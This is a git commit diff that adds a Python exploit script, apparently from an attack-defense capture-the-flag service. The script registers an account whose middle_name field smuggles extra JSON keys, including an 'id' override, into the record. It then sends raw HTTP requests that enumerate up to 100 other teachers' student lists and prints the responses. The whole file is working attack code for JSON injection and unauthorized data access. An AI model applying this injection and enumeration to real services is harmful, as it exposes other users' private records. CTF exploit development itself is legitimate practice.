init here

2025-11-26 21:32:41 +03:00
commit 33c97acade
91 changed files with 9155 additions and 0 deletions
--- a/sploits/03_json_injection.py
+++ b/sploits/03_json_injection.py
@@ -0,0 +1,44 @@
+#!/usr/bin/env python3
+
+import socket
+import common
+
+first_name = common.random_string()
+last_name = common.random_string()
+password = common.random_string()
+username = f"{first_name}.{last_name}"
+
+_, _, base_teacher_id = common.register_random_teacher()
+
+common.register_teacher(
+    first_name,
+    last_name,
+    password,
+    username,
+    middle_name="""Injectionovich", "id": 228, "kek": "pek"""
+)
+
+for teacher_id in range(max(1, base_teacher_id - 100), base_teacher_id):
+    path = f"/api/students?учитель={teacher_id}"
+    headers = common.get_auth_headers((username, password))
+
+    s = socket.create_connection((common.HOST, common.PORT))
+
+    s.sendall(f"""GET {path} HTTP/1.1
+    Authorization: {headers["Authorization"]}
+
+    """.encode("utf-8"))
+
+    chunks = []
+
+    while True:
+        data = s.recv(4096)
+        if not data:
+            break
+
+        chunks.append(data)
+
+    body = b"".join(chunks).decode("utf-8")
+
+    print(body)
+